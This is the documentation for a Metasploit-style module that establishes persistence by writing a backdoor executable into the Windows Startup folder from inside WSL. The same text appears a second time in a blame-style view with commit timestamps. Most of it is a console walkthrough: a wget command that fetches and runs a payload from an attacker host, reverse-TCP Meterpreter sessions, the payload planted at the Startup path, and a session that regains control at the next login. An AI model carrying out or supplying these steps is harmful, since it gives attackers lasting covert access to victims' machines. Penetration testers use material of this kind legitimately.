documentation/modules/exploit/linux/persistence/wsl/startup_folder.md

## Vulnerable Application

This module establishes persistence by creating a payload in the windows startup folder from within
the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.

Verified on Windows 10 with Ubuntu 24.04 WSL distribution.

## Verification Steps

1. Get a shell on WSL (wsl could be started in a user or admin context)
2. `use exploit/linux/persistence/wsl/startup_folder`
3. `set SESSION <id>`
4. `exploit`

## Options

### PAYLOAD_NAME

Name of backdoor executable. Defaults to a random name

### CONTEXT

Target each User or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`.

### USER

Only required when `CONTEXT` is set to `USER`. The user to exploit, or `ALL` for all of them. Defaults to `ALL`.

## Scenarios

### Tested on Windows 10 with Ubuntu 22.04 WSL

Initial access into WSL

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown
msf exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : win10prolicensed.localdomain
OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: windows
meterpreter > background
[*] Backgrounding session 1...
```

Install persistence

```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > set session 1
session => 1
msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(linux/persistence/wsl/startup_folder) > [!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux. This module works with: Windows.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Inside WSL environment
[+] The target appears to be vulnerable. Likely exploitable
[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc
```

Logout and back in to windows

```
[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died

msf exploit(linux/persistence/wsl/startup_folder) > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500

msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
```
wsl startup folder persistence 2025-12-28 11:15:04 -05:00			`## Vulnerable Application`

			`This module establishes persistence by creating a payload in the windows startup folder from within`
			`the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.`

			`Verified on Windows 10 with Ubuntu 24.04 WSL distribution.`

			`## Verification Steps`

wsl startup folder persistence 2025-12-28 11:17:28 -05:00			`1. Get a shell on WSL (wsl could be started in a user or admin context)`
			2. `use exploit/linux/persistence/wsl/startup_folder`
			3. `set SESSION <id>`
			4. `exploit`
wsl startup folder persistence 2025-12-28 11:15:04 -05:00
			`## Options`

			`### PAYLOAD_NAME`

			`Name of backdoor executable. Defaults to a random name`

			`### CONTEXT`

			Target each User or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`.

target user for wsl_startup_folder 2026-02-21 08:31:56 -05:00			`### USER`

			Only required when `CONTEXT` is set to `USER`. The user to exploit, or `ALL` for all of them. Defaults to `ALL`.

wsl startup folder persistence 2025-12-28 11:15:04 -05:00			`## Scenarios`

			`### Tested on Windows 10 with Ubuntu 22.04 WSL`

			`Initial access into WSL`

			```
			`resource (/root/.msf4/msfconsole.rc)> setg verbose true`
			`verbose => true`
			`resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`payload => cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set target 7`
			`target => 7`
			`resource (/root/.msf4/msfconsole.rc)> set srvport 8082`
			`srvport => 8082`
			`resource (/root/.msf4/msfconsole.rc)> set uripath l`
			`uripath => l`
			`resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set lport 4446`
			`lport => 4446`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Starting persistent handler(s)...`
			`[*] Started reverse TCP handler on 1.1.1.1:4446`
			`[*] Using URL: http://1.1.1.1:8082/l`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown`
			`msf exploit(multi/script/web_delivery) >`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3090404 bytes) to 2.2.2.2`
			`[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500`

			`msf exploit(multi/script/web_delivery) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : win10prolicensed.localdomain`
			`OS : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter > getuid`
			`Server username: windows`
			`meterpreter > background`
			`[*] Backgrounding session 1...`
			```

			`Install persistence`

			```
			`msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`msf exploit(linux/persistence/wsl/startup_folder) > set session 1`
			`session => 1`
			`msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp`
			`PAYLOAD => windows/meterpreter/reverse_tcp`
			`msf exploit(linux/persistence/wsl/startup_folder) > exploit`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`

			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`msf exploit(linux/persistence/wsl/startup_folder) > [!] SESSION may not be compatible with this module:`
			`[!] * incompatible session platform: linux. This module works with: Windows.`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] Inside WSL environment`
			`[+] The target appears to be vulnerable. Likely exploitable`
			`[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe`
			`[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc`
			```

			`Logout and back in to windows`

			```
			`[*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died`

			`msf exploit(linux/persistence/wsl/startup_folder) >`
			`[*] Sending stage (188998 bytes) to 2.2.2.2`
			`[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500`

			`msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2`
			`[*] Starting interaction with 2...`

			`meterpreter > getuid`
			`Server username: WIN10PROLICENSE\windows`
			`meterpreter > sysinfo`
			`Computer : WIN10PROLICENSE`
			`OS : Windows 10 1909 (10.0 Build 18363).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter > background`
			```